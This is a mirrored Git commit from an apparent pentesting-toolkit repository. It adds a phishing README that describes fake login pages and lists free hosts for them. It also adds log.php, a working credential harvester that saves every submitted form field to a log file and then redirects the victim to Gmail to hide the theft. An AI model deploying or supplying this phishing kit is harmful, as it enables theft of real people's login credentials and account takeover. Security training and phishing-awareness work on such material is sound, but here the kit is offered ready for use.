mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 11:09:09 -04:00
phishing
This commit is contained in:
parent
f4b8b9ad43
commit
a0c026ca27
Before Width: | Height: | Size: 58 B After Width: | Height: | Size: 58 B |
18
Web_Exploits/Phishing/README.md
Normal file
18
Web_Exploits/Phishing/README.md
Normal file
@ -0,0 +1,18 @@
|
||||
# Phishing
|
||||
|
||||
* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original.
|
||||
|
||||
* Fake login/scamming pages which are often to hack identification information.
|
||||
|
||||
## Tools
|
||||
|
||||
### Free Hostings:
|
||||
|
||||
- http://www.my3gb.com/
|
||||
- http://110mb.com/
|
||||
- http://www.freehostia.com/
|
||||
- http://www.awardspace.com/
|
||||
- http://prohosts.org/
|
||||
- http://www.000webhost.com/
|
||||
- http://www.atspace.com/
|
||||
- http://zymic.com/
|
13
Web_Exploits/Phishing/log.php
Normal file
13
Web_Exploits/Phishing/log.php
Normal file
@ -0,0 +1,13 @@
|
||||
<?php
|
||||
header ('Location:http://www.gmail.com');
|
||||
$handle = fopen("log.txt", "a");
|
||||
foreach($_POST as $variable => $value) {
|
||||
fwrite($handle, $variable);
|
||||
fwrite($handle, "=");
|
||||
fwrite($handle, $value);
|
||||
fwrite($handle, "\r\n"); }
|
||||
fwrite($handle,"\r\n");
|
||||
fclose($handle);
|
||||
exit;
|
||||
?>
|
||||
|
Loading…
x
Reference in New Issue
Block a user